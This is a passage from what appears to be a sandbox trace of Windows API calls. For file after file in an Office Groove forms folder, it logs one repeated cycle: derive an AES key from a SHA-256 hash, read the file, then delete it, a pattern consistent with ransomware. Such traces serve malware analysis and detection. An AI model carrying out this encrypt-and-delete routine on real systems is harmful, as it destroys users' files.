(hHash=0x284d6a8) returned 1 [0164.978] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.978] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.979] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_casual.gif")) returned 1 [0164.981] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.981] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.981] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.981] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.981] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7dd3 [0164.981] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.012] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.012] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.012] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.013] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_country.gif")) returned 1 [0165.015] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.015] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.015] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.015] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.015] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132a [0165.016] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.029] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.029] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.029] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_earthy.gif")) returned 1 [0165.032] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.032] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.032] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.032] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.032] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb9b8 [0165.032] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.057] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.057] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.057] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_formshomepage.gif")) returned 1 [0165.060] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.061] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.061] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.061] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.061] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4ebb [0165.061] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.066] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.066] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.066] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_formshomepageblank.gif")) returned 1 [0165.069] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.070] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.070] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.070] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.070] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5690 [0165.070] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.073] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.073] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.073] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_greentea.gif")) returned 1 [0165.130] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.130] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.131] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.131] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.131] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a [0165.131] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x6a, lpOverlapped=0x0) returned 1 [0165.132] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.132] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.132] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.134] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_groove.gif")) returned 1 [0165.135] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.135] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.135] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.135] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.135] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a6 [0165.136] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.146] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.146] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.146] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_lightspirit.gif")) returned 1 [0165.149] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.150] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.150] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.150] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.150] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d57 [0165.150] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.153] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.153] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.153] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_olivegreen.gif")) returned 1 [0165.156] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.157] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.157] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.157] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.157] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1845 [0165.157] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.159] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.159] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.159] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_premium.gif")) returned 1 [0165.162] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.163] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.163] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.163] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.163] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5141 [0165.163] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.166] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.166] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.166] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.168] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_slateblue.gif")) returned 1 [0165.169] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.170] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.170] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.170] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.170] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x193c [0165.170] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.181] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.181] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.181] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_texturedblue.gif")) returned 1 [0165.184] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.184] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.184] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.184] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.184] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c64 [0165.184] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.201] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.201] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.201] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_velvetrose.gif")) returned 1 [0165.204] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.205] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.205] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.205] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.205] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x276 [0165.205] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.213] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.213] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.213] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left.gif")) returned 1 [0165.215] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.216] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.216] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.216] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.216] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe6 [0165.216] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.217] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.217] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.217] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left_disable.gif")) returned 1 [0165.220] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.221] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.221] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.221] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.221] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41b [0165.221] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.234] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.234] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.234] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left_over.gif")) returned 1 [0165.237] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.238] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.238] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.238] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.238] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb9 [0165.238] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.239] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.239] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.239] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid.gif")) returned 1 [0165.241] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.242] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.242] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.242] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.242] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35 [0165.242] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x35, lpOverlapped=0x0) returned 1 [0165.244] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.244] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.244] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid_disable.gif")) returned 1 [0165.246] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.247] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.247] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.247] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.247] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbb [0165.247] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.249] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.249] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.249] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.251] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft 